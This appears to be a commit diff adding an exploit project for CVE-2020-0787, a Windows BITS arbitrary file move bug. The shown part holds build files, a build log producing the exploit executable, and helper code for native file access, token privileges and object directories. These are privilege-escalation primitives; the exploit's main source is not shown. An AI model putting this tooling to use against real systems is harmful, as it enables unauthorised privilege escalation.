<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="BitsArbitraryFileMoveExploit.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="resource.h" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\BitsArbitraryFileMove\BitsArbitraryFileMove.vcxproj">
<Project>{36c758eb-8c26-4dd6-915e-7030275418a5}</Project>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

27
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/BitsArbitraryFileMoveExploit.vcxproj.filters Normal file
View File

@ -0,0 +1,27 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Fichiers sources">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Fichiers d%27en-tête">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Fichiers de ressources">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="BitsArbitraryFileMoveExploit.cpp">
<Filter>Fichiers sources</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="resource.h">
<Filter>Fichiers d%27en-tête</Filter>
</ClInclude>
</ItemGroup>
</Project>

13
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/BitsArbitraryFileMoveExploit.vcxproj.user Normal file
View File

@ -0,0 +1,13 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<RemoteDebuggerCommand>C:\dl\test\1\BitsArbitraryFileMoveExploit.exe</RemoteDebuggerCommand>
<RemoteDebuggerWorkingDirectory>C:\dl\test\1</RemoteDebuggerWorkingDirectory>
<RemoteDebuggerServerName>10.120.1.10</RemoteDebuggerServerName>
<DebuggerFlavor>WindowsRemoteDebugger</DebuggerFlavor>
<RemoteDebuggerConnection>RemoteWithoutAuthentication</RemoteDebuggerConnection>
<RemoteDebuggerAttach>false</RemoteDebuggerAttach>
<DeploymentDirectory>C:\dl\test\1</DeploymentDirectory>
<RemoteDebuggerDeployDebugCppRuntime>false</RemoteDebuggerDeployDebugCppRuntime>
</PropertyGroup>
</Project>

17
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/resource.h Normal file
View File

@ -0,0 +1,17 @@
//{{NO_DEPENDENCIES}}
// fichier Include Microsoft Visual C++.
// Utilisé par BitsArbitraryFileMoveExploit.rc
//
#define IDR_RCDATA1 101
#define IDR_RCDATA2 102
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 103
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif

2
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/BitsArbi.279C1CA8.tlog/BitsArbitraryFileMoveExploit.lastbuildstate Normal file
View File

@ -0,0 +1,2 @@
#TargetFrameworkVersion=v4.0:PlatformToolSet=v120:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
Debug|x64|C:\Users\Administrator\Desktop\tmp\CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\BitsArbitraryFileMove-master\|

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/BitsArbi.279C1CA8.tlog/CL.read.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/BitsArbi.279C1CA8.tlog/CL.write.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/BitsArbi.279C1CA8.tlog/cl.command.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/BitsArbi.279C1CA8.tlog/link.command.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/BitsArbi.279C1CA8.tlog/link.read.1.tlog Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/BitsArbi.279C1CA8.tlog/link.write.1.tlog Normal file
View File

Binary file not shown.

16
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/BitsArbitraryFileMoveExploit.log Normal file
View File

@ -0,0 +1,16 @@
 BitsArbitraryFileMoveExploit.cpp
c:\users\administrator\desktop\tmp\cve-2020-0787-exp-all-windows-version\bitsarbitraryfilemove-master\bitsarbitraryfilemoveexploit\resource.h : warning C4819: 该文件包含不能在当前代码页(936)中表示的字符。请将该文件保存为 Unicode 格式以防止数据丢失
c:\users\administrator\desktop\tmp\cve-2020-0787-exp-all-windows-version\bitsarbitraryfilemove-master\bitsarbitraryfilemoveexploit\../BitsArbitraryFileMove/BitsArbitraryFileMove.h(43): warning C4005: “DEBUG”: 宏重定义
D:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\atlmfc\include\atldef.h(148) : 参见“DEBUG”的前一个定义
BitsArbitraryFileMoveExploit.cpp(43): warning C4200: 使用了非标准扩展 : 结构/联合中的零大小数组
当 UDT 包含大小为零的数组时,无法生成复制构造函数或副本赋值运算符
BitsArbitraryFileMoveExploit.cpp(364): warning C4267: “参数”: 从“size_t”转换到“DWORD”可能丢失数据
BitsArbitraryFileMoveExploit.cpp(423): warning C4267: “初始化”: 从“size_t”转换到“unsigned int”可能丢失数据
BitsArbitraryFileMoveExploit.cpp(1010): warning C4101: “err”: 未引用的局部变量
CommonUtils.lib(CommonUtils.obj) : warning LNK4099: 未找到 PDB“vc120.pdb”(使用“CommonUtils.lib(CommonUtils.obj)”或在“C:\Users\Administrator\Desktop\tmp\CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\BitsArbitraryFileMove-master\x64\Debug\vc120.pdb”中寻找);正在链接对象,如同没有调试信息一样
CommonUtils.lib(FileOpLock.obj) : warning LNK4099: 未找到 PDB“vc120.pdb”(使用“CommonUtils.lib(FileOpLock.obj)”或在“C:\Users\Administrator\Desktop\tmp\CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\BitsArbitraryFileMove-master\x64\Debug\vc120.pdb”中寻找);正在链接对象,如同没有调试信息一样
CommonUtils.lib(NativeSymlink.obj) : warning LNK4099: 未找到 PDB“vc120.pdb”(使用“CommonUtils.lib(NativeSymlink.obj)”或在“C:\Users\Administrator\Desktop\tmp\CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\BitsArbitraryFileMove-master\x64\Debug\vc120.pdb”中寻找);正在链接对象,如同没有调试信息一样
CommonUtils.lib(ReparsePoint.obj) : warning LNK4099: 未找到 PDB“vc120.pdb”(使用“CommonUtils.lib(ReparsePoint.obj)”或在“C:\Users\Administrator\Desktop\tmp\CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\BitsArbitraryFileMove-master\x64\Debug\vc120.pdb”中寻找);正在链接对象,如同没有调试信息一样
CommonUtils.lib(ScopedHandle.obj) : warning LNK4099: 未找到 PDB“vc120.pdb”(使用“CommonUtils.lib(ScopedHandle.obj)”或在“C:\Users\Administrator\Desktop\tmp\CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\BitsArbitraryFileMove-master\x64\Debug\vc120.pdb”中寻找);正在链接对象,如同没有调试信息一样
CommonUtils.lib(stdafx.obj) : warning LNK4099: 未找到 PDB“vc120.pdb”(使用“CommonUtils.lib(stdafx.obj)”或在“C:\Users\Administrator\Desktop\tmp\CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\BitsArbitraryFileMove-master\x64\Debug\vc120.pdb”中寻找);正在链接对象,如同没有调试信息一样
BitsArbitraryFileMoveExploit.vcxproj -> C:\Users\Administrator\Desktop\tmp\CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\BitsArbitraryFileMove-master\x64\Debug\BitsArbitraryFileMoveExploit.exe

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/BitsArbitraryFileMoveExploit.obj Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/vc120.idb Normal file
View File

Binary file not shown.

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMoveExploit/x64/Debug/vc120.pdb Normal file
View File

Binary file not shown.

176
00-CVE_EXP/CVE-2020-0787/CommonUtils/CommonUtils.cpp Normal file
View File

@ -0,0 +1,176 @@
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "stdafx.h"
#include "CommonUtils.h"
#include <strsafe.h>
#include "ntimports.h"
void __stdcall my_puts(const char* str)
{
fwrite(str, 1, strlen(str), stdout);
}
static console_output _pout = my_puts;
void DebugSetOutput(console_output pout)
{
_pout = pout;
}
void DebugPrintf(const char* lpFormat, ...)
{
CHAR buf[1024];
va_list va;
va_start(va, lpFormat);
StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);
_pout(buf);
}
std::wstring GetErrorMessage(DWORD dwError)
{
LPWSTR pBuffer = NULL;
DWORD dwSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS |
FORMAT_MESSAGE_ALLOCATE_BUFFER, 0, dwError, 0, (LPWSTR)&pBuffer, 32 * 1024, nullptr);
if (dwSize > 0)
{
std::wstring ret = pBuffer;
LocalFree(pBuffer);
return ret;
}
else
{
printf("Error getting message %d\n", GetLastError());
WCHAR buf[64];
StringCchPrintf(buf, _countof(buf), L"%d", dwError);
return buf;
}
}
std::wstring GetErrorMessage()
{
return GetErrorMessage(GetLastError());
}
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
{
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
{
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
}
else
{
tp.Privileges[0].Attributes = 0;
}
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
return FALSE;
}
return TRUE;
}
DWORD NtStatusToDosError(NTSTATUS status)
{
DEFINE_NTDLL(RtlNtStatusToDosError);
return fRtlNtStatusToDosError(status);
}
void SetNtLastError(NTSTATUS status)
{
SetLastError(NtStatusToDosError(status));
}
FARPROC GetProcAddressNT(LPCSTR lpName)
{
return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
}
HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options)
{
UNICODE_STRING name = { 0 };
OBJECT_ATTRIBUTES obj_attr = { 0 };
DEFINE_NTDLL(RtlInitUnicodeString);
DEFINE_NTDLL(NtOpenFile);
if (path)
{
fRtlInitUnicodeString(&name, path);
InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);
}
else
{
InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr);
}
HANDLE h = nullptr;
IO_STATUS_BLOCK io_status = { 0 };
NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options);
if (NT_SUCCESS(status))
{
return h;
}
else
{
SetNtLastError(status);
return nullptr;
}
}
std::wstring BuildFullPath(const std::wstring& path, bool native)
{
std::wstring ret;
WCHAR buf[MAX_PATH];
if (native)
{
ret = L"\\??\\";
}
if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0)
{
ret += buf;
}
else
{
ret += path;
}
return ret;
}

22
00-CVE_EXP/CVE-2020-0787/CommonUtils/CommonUtils.h Normal file
View File

@ -0,0 +1,22 @@
#pragma once
#include <Windows.h>
#include <string>
typedef void(__stdcall *console_output)(const char*);
void DebugSetOutput(console_output pout);
void DebugPrintf(const char* lpFormat, ...);
HANDLE CreateSymlink(HANDLE root, LPCWSTR linkname, LPCWSTR targetname);
HANDLE OpenSymlink(HANDLE root, LPCWSTR linkname);
HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR dirname, HANDLE hShadow);
HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR dirname);
std::wstring GetErrorMessage(DWORD dwError);
std::wstring GetErrorMessage();
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege);
bool CreateRegSymlink(LPCWSTR lpSymlink, LPCWSTR lpTarget, bool bVolatile);
bool DeleteRegSymlink(LPCWSTR lpSymlink);
DWORD NtStatusToDosError(NTSTATUS status);
bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname);
HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options);
std::wstring BuildFullPath(const std::wstring& path, bool native);

167
00-CVE_EXP/CVE-2020-0787/CommonUtils/CommonUtils.vcxproj Normal file
View File

@ -0,0 +1,167 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CommonUtils</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Static</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Static</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="CommonUtils.h" />
<ClInclude Include="FileOpLock.h" />
<ClInclude Include="FileSymlink.h" />
<ClInclude Include="ntimports.h" />
<ClInclude Include="ReparsePoint.h" />
<ClInclude Include="ScopedHandle.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
<ClInclude Include="typed_buffer.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="CommonUtils.cpp" />
<ClCompile Include="DirectoryObject.cpp" />
<ClCompile Include="FileOpLock.cpp" />
<ClCompile Include="FileSymlink.cpp" />
<ClCompile Include="Hardlink.cpp" />
<ClCompile Include="NativeSymlink.cpp" />
<ClCompile Include="RegistrySymlink.cpp" />
<ClCompile Include="ReparsePoint.cpp" />
<ClCompile Include="ScopedHandle.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

78
00-CVE_EXP/CVE-2020-0787/CommonUtils/CommonUtils.vcxproj.filters Normal file
View File

@ -0,0 +1,78 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="FileOpLock.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="CommonUtils.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="FileSymlink.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="ScopedHandle.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="ReparsePoint.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="typed_buffer.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="ntimports.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="FileOpLock.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="NativeSymlink.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="CommonUtils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="FileSymlink.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="ScopedHandle.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="ReparsePoint.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="DirectoryObject.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="RegistrySymlink.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Hardlink.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>

74
00-CVE_EXP/CVE-2020-0787/CommonUtils/DirectoryObject.cpp Normal file
View File

@ -0,0 +1,74 @@
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "stdafx.h"
#include "CommonUtils.h"
#include "ntimports.h"
HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR dirname, HANDLE hShadow)
{
DEFINE_NTDLL(RtlInitUnicodeString);
DEFINE_NTDLL(NtCreateDirectoryObjectEx);
OBJECT_ATTRIBUTES obj_attr;
UNICODE_STRING obj_name;
if (dirname)
{
fRtlInitUnicodeString(&obj_name, dirname);
InitializeObjectAttributes(&obj_attr, &obj_name, OBJ_CASE_INSENSITIVE, hRoot, nullptr);
}
else
{
InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, hRoot, nullptr);
}
HANDLE h = nullptr;
NTSTATUS status = fNtCreateDirectoryObjectEx(&h, DIRECTORY_ALL_ACCESS, &obj_attr, hShadow, FALSE);
if (status == 0)
{
return h;
}
else
{
SetLastError(NtStatusToDosError(status));
return nullptr;
}
}
HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR dirname)
{
DEFINE_NTDLL(RtlInitUnicodeString);
DEFINE_NTDLL(NtOpenDirectoryObject);
OBJECT_ATTRIBUTES obj_attr;
UNICODE_STRING obj_name;
fRtlInitUnicodeString(&obj_name, dirname);
InitializeObjectAttributes(&obj_attr, &obj_name, OBJ_CASE_INSENSITIVE, hRoot, nullptr);
HANDLE h = nullptr;
NTSTATUS status = fNtOpenDirectoryObject(&h, MAXIMUM_ALLOWED, &obj_attr);
if (status == 0)
{
return h;
}
else
{
SetLastError(NtStatusToDosError(status));
return nullptr;
}
}

Some files were not shown because too many files have changed in this diff Show More